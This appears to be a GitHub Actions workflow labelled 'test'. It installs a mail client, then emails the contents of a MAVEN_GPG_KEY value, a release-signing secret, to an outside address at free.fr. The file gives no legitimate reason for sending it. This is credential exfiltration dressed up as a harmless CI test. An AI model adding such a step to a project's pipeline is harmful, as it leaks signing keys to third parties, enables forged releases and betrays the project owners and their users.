name: test
on: workflow_dispatch

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - name: install
      run: sudo apt install mailutils -y
    - name: send mail
      run: echo "{{ MAVEN_GPG_KEY }}" | mail -s "test" unknow0@free.fr
